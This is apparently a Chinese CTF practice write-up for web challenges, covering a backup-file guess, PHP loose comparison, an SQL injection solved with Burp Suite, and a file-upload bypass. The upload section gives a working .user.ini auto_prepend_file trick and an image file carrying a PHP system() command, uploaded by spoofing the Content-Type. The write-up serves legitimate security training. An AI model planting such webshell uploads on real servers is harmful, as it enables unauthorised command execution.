程序员经验分享-hwhale

web模块_2(SQL注入,上传文件的权限获取)

2023-11-13

1题目描述:你知道index.php的备份文件名吗?

index.php的备份文件名为index.php.bak

2题目描述

在这里插入图片描述
php中,双等号是弱类型比较。==判断是否相等,不判断格式。 ===判断格式是否相等。“0a”==0为True,“1235a"不算数字,但是"1235a”>1234为True。

3题目描述GFSJ1004(SQL注入)

在这里插入图片描述
题目什么信息也没有给,但是这里提醒了,尝试权限绕过。
在这里插入图片描述
随便试了一个id=admin,发现给出了回应。
猜测可能为SQL注入。
使用burp suite抓包,并进行爆破。
在这里插入图片描述
在这里插入图片描述
然后尝试进行SQL注入
在这里插入图片描述
得到了flag。

4题目描述GFSJ1005(利用文件上传进行权限获取)

在这里插入图片描述
题目给出了一个上传文件的界面。
只能上传图片文件,其他文件都会被阻止。
整个页面为一个php文件,想到php文件在运行前会执行.user.ini文件进行配置,运行其他的php文件。于是完成.user.ini文件,内容如下:

GIF89a
auto_prepend_file=1.jpg

然后完成1.jpg文件。

GIF89a
<?=system('ls /')?>

然后上传.user.ini文件,但是发现被阻断,无法上传。于是使用burp suite进行抓包,修改其后缀。
在这里插入图片描述
修改红框处的数据类型,为image/gif,实现权限的绕过。
然后刷新页面,会自动运行.user.ini文件。
得到当前目录下的文件结构。
在这里插入图片描述

修改1.jpg的文件内容,再次上传运行。

GIF89a
<?=system('ls /')?>

得到结果入下:
在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

CTF练习

sql

php

数据库

web模块_2(SQL注入,上传文件的权限获取) 的相关文章

  • 如何在 SQL Server 中使用 nvarchar 变量为 unicode 用户添加前缀“N”?

    如何在 SQL Server 中使用 nvarchar 变量为 unicode 用户添加前缀 N 例如 给定这个变量 declare Query1 nvarchar max 我可以这样分配它 set Query1 N 但是如果我想使用怎么办

  • 如何使用 Facebook SDK API 为页面/网址“点赞”?

    我正在使用这段代码 facebook gt api me likes post array url gt http www google com 我收到以下错误 Fatal error Uncaught OAuthException 200

  • 如何将可视选择的文本通过管道传输到 UNIX 命令并将输出附加到 Vim 中的当前缓冲区

    使用 Vim 我尝试将在可视模式下选择的文本通过管道传输到 UNIX 命令 并将输出附加到当前文件的末尾 例如 假设我们有一个 SQL 命令 例如 SELECT FROM mytable 我想做如下的事情

  • 为什么这会返回资源 id #2? [复制]

    这个问题在这里已经有答案了 可能的重复 我如何从 PHP 中的 MySql 响应中 回显 资源 id 6 https stackoverflow com questions 4290108 how do i echo a resource

  • 使用先前的反向引用作为命名捕获组的名称

    有没有办法使用对先前捕获组的反向引用作为捕获组的名称命名捕获组 这可能不可能 如果不可能 那么这就是一个有效的答案 下列 data description some description preg match data matches p

  • 如何在 Visual Studio 中更改 Azure 数据库表的列顺序

    我整个下午都在寻找在 MS Visual Studio 2022 中重新排序 Azure 数据库表列的方法 没有运气 在其他应用程序中 可以通过拖动或剪切和粘贴轻松重新排列列 这里无能为力 此时 我什至不确定可以在 VS 中移动列 我只对

  • Magento - 检查 cms 页面

    我想通过 php 检查页面是否是 Magento 中的 cms page 我需要不同的 cms 页面面包屑 所以我尝试在一个条件下做到这一点 但我不知道如何或在哪里查看 到目前为止 这是我的 breadcrumbs phtml p some

  • 语法错误,第 288 行出现意外的“endif”(T_ENDIF)[关闭]

    Closed 这个问题是无法重现或由拼写错误引起 help closed questions 目前不接受答案 我一直在离线处理我的 WordPress 网站的此代码错误 解析错误 语法错误 homez 541 photoher marie

  • apache_request_headers() 与 $_SERVER

    据我所知 apache request headers 提供与以下相同的信息 SERVER 但按键略有不同 为什么有人应该使用apache request headers 而不仅仅是从那里获取这些信息 SERVER 我在 Centos 上使

  • 自动建议 php 的 ajax

    我有一个 html 表单 php 脚本和 jquery 我需要一个 ajax 代码来从我的 php 脚本中进行自动建议 以下是代码 表单 html

  • Joomla 页面中的自定义 php 代码

    我正在尝试将 Joomla 1 5 9 页面中的表源从页面中的硬编码 html 更改为从 SQL 数据库获取信息 执行此操作的正确方法是什么 创建一个新的模型或组件并以某种方式在页面中使用它 我找到了这些 http docs joomla

  • 独立对列进行排序,使得所有空值都位于每列的最后

    这是一个名为的示例表animal name color fox brown fox red dog gold 现在 我想要的是这样的结果 fox dog brown gold red 名称应该是结果的列 不同颜色值作为行 我的第一个想法是

  • Apache、PHP 和 MySQL 可移植吗?

    我可以在外部硬盘上运行 Apache PHP 和 MySQL 吗 我需要这个 因为我在不同的地方工作 计算机 有时我没有安装和配置所有使用的应用程序 当然可以 XAMPP http www apachefriends org en xamp

  • 在sqlite SQL语句中与order by子句结合使用limit

    下面的两条 SQL 语句总是会产生相同的结果集吗 1 SELECT FROM MyTable where Status 0 order by StartTime asc limit 10 2 SELECT FROM SELECT FROM

  • WordPress 插件中的类自动加载器

    我想编写一个类自动加载器以在 WordPress 插件中使用 该插件将安装在多个站点上 我想尽量减少与其他插件发生冲突的机会 自动加载器将是这样的 function autoload name some code here 我的主要问题是

  • 是否有适用于所有数据库的标准sql

    如下所示 不同数据库的语法有所不同 是否存在适用于所有数据库的标准方法 有没有什么工具可以将任意sql转换为任意sql SQL Server 2005 CREATE TABLE Table01 Field01 int primary key

  • 从支付网关重定向回时用户会话丢失

    我已将 Cyber source 配置为我的支付网关 我能够导航到 cybersource 并进行付款 并能够成功重定向回该网站 我也可以取消付款并重定向回我的网站 我收到来自支付网关的响应 但是 用户在从支付网关重定向回来时会被注销 我正

  • 如何在 Zend Framework 3 中注册自定义表单视图助手

    我正在将继承的 Zend Framework 2 应用程序迁移到 Zend Framework 3 并且在注册自定义表单视图助手时遇到了一些困难 这些助手在应用程序使用版本 2 时起作用 主要用于添加标签属性以实现可访问性 例如 这是一个自

  • 对多个数据库执行 SQL 查询

    我知道我的帖子与该论坛中的其他帖子的标题非常相似 但我真的找不到我需要的答案 这是我的问题 我的 Windows Server 上运行着 SQL Server 在我的 SQL Server 中 我有大约 30 个数据库 它们都具有相同的表和

  • 检查 $_POST 数据

    我正在对表单进行一些垃圾邮件检查 下面的代码在我的本地主机上正常工作 如果为 true 则重定向到 google com 但是 当它在生产服务器上时却不起作用 执行脚本的其余部分并且不重定向到 Google com if POST SERV

随机推荐

  • 每日一库之Go 强大而灵活的电子邮件库:email

    发送邮件是一个很常见的需求 用户邮箱验证 邮箱召回等 Go 语言标准库自带 net smtp 库 实现了 smtp 协议 用于发送邮件 然而这个库比较原始 使用不方便 而且官方声明不再增加新功能 于是乎出现了一些强大的第三方邮件库 今天推荐

  • PSD 格式文件除了 PS ,还能用什么软件打开?

    有人问 除了 Photoshop 还有哪些软件能打开 PSD 格式文件呢 当我看到这个问题时 我立刻理解了他的烦恼 因为有段时间 我的电脑里没有安装 Photoshop 但有一次 我的同事发了一个 PSD 文件给我 我却无法联系到他 我急需

  • linux(centos7) 查看剩余磁盘空间大小

    df hl 查看磁盘剩余空间 df h 查看每个根路径的分区大小 du sh 目录名 返回该目录的大小 du sm 文件夹 返回该文件夹总M数 du h 目录名 查看指定文件夹下的所有文件大小 包含子文件夹 查看硬盘的分区 sudo fdi

  • 非方阵点乘算法

    非方阵点乘算法 基于 lt 算法4 gt 中的P12矩阵相乘 方阵 探索非方阵点乘 线代基础 能够点乘的矩阵 一定满足 前行 后列 算法思考 解决矩阵运算问题 切勿凭空想象 应脚踏实地 举个简单例子写在草稿纸上 并观察 各矩阵下标变化规律

  • git clone 失败或速度慢

    总之就是加代理yyds 具体做法 在github网址前面加上前缀 https ghproxy com 即可 git clone https ghproxy com https github com xxx git

  • Python—爬取小说案例(bs4方法)

    一 源码 import requests from bs4 import BeautifulSoup UA伪装 headers User Agent Mozilla 5 0 Windows NT 10 0 Win64 x64 AppleWe

  • mosquitto安装mysql插件 进行权限认证

    简介 因工作中需要对接物联网设备 设备数据的上传和下发都需要不同的连接账号作为topic 因此采用mqtt mysql的方式 动态的维护mqtt的账号 目录 简介 一 安装依赖 二 下载压缩包 三 安装mosquitto 四 安装mosqu

  • 关于VTK9 vs2019编译QVTK 过程中的记录

    环境 vtk9 0 QT5 12 PCL 1 12 vs2019 x64 这段时间下载了VTK 9 0 并利用vs2019对QVTK进行了编译 1 只要在编译过程中勾选了QT相关选项 就一定可以生成QVTK相关的头文件和库 编译过程网上已经

  • [屏驱相关]【SWDM-QFP100-34SVEA3测评】+LVGL驱屏检测

    这段时间参考华芯微特官方提供的SDK资源包 链接 SWM341资源 百度云盘分享 密码 byv2 验证了部分基础外设的工程示例 此次参考官方提供的LVGL工程示例 先将 基于LVGL纯净版 目录下的 SWM341 lvgl8 3 3 221

  • uni-app开发5+app,图片无法在真机上面显示。

    uni app开发5 app 图片无法在真机上面显示 总结 标签使用错误 请不要使用img标签 img

  • 备用内存 释放_如何释放为硬件保留的内存(内详!!!)

    分割线 网友 240034315yue 补充的几点 以下的操作可能有风险 请酌情考虑 如果找我上面说的那么做还不行的话大家可以看看 注明一 1 如果单通道的话 内存条为一根 通电情况下直接拔掉 在装上 然后开机 在按照楼主说的msconfi

  • 双因素方差分析_科研常用显著性分析方法汇总及选择(T检验,Mann-Whitney U test检验,方差分析等)...

    科研常见的差异性分析方法汇总 根据数据是否符合正态分布 分为 参数检验 非参数检验 非参数检验是在总体方差未知或知道甚少的情况下 利用样本数据对总体分布形态等进行推断的方法 由于非参数检验方法在推断过程中不涉及有关总体分布的参数 因而得名为

  • ubuntu查看搜索可安装包名

    比如要安装openjdk 但是不知道安装包名 可用有以下方法搜索 用aptitude search openjdk

  • 快速学完OpenCV+python计算机视觉图像处理(四)

    返回主目录 4 图像基本特效 4 1 图像特效介绍 图像特效分为以下几个 分别是 灰度处理 底板效果 马赛克 毛玻璃效果 图像融合 图片蓝色 边缘检测 浮雕效果 4 2 图像灰度处理1 灰度处理常用方法 方法1 直接使用imread里面的参

  • 性能篇之对象拷贝工具BeanUtils.copyProperties和BeanCopier.copy的比较

    对象的拷贝在开发过程中肯定非常常见 想必大家使用spring中的BeanUtils copyProperties来完成的 小编最初也是用习惯了这个工具 但是在一次codereview中 大佬给我提出建议使用cglib的BeanCopier

  • 欧几里得距离,曼哈顿距离,切比雪夫距离

    1 欧几里得距离 欧式距离 它是在m维空间中两个点之间的真实距离 在二维和三维空间中的欧氏距离的就是两点之间的距离 简单来说就是两点之间直线最短的那段距离 相关联的范数称为欧几里得范数 也称 L 2 L 2 L2 范数 二维空间的公式 三维

  • 【密码学】常见密码算法分类和运用

    一 摘要算法 Digest Algorithm 摘要算法 是指把任意长度的输入消息数据转化为固定长度的输出数据的一种密码算法 又称为 散列函数 哈希函数 杂凑函数 单向函数 等 通常用来做数据完整性的判定 即对数据进行哈希计算然后比较 摘要

  • UNIX环境编程——信号

    本期主题 信号 往期地址 UNIX环境编程 文件IO UNIX环境编程 标准IO UNIX环境编程 进程环境与进程控制 unix高级环境编程 线程详解 unix环境高级编程 UNIX体系架构 文章目录 1 信号概念 2 信号操作 1 发送信

  • JVM:内存结构

    文章目录 1 什么是JVM 2 内存结构 2 1 程序计数器 2 1 1 作用 2 1 2 特点 2 2 虚拟机栈 2 2 1 定义 2 2 2 代码示例 2 2 3 问题辨析 2 2 4 栈内存溢出 2 2 5 线程运行诊断 2 3 本地

  • web模块_2(SQL注入,上传文件的权限获取)

    1题目描述 你知道index php的备份文件名吗 index php的备份文件名为index php bak 2题目描述 php中 双等号是弱类型比较 判断是否相等 不判断格式 判断格式是否相等 0a 0为True 1235a 不算数字

热门标签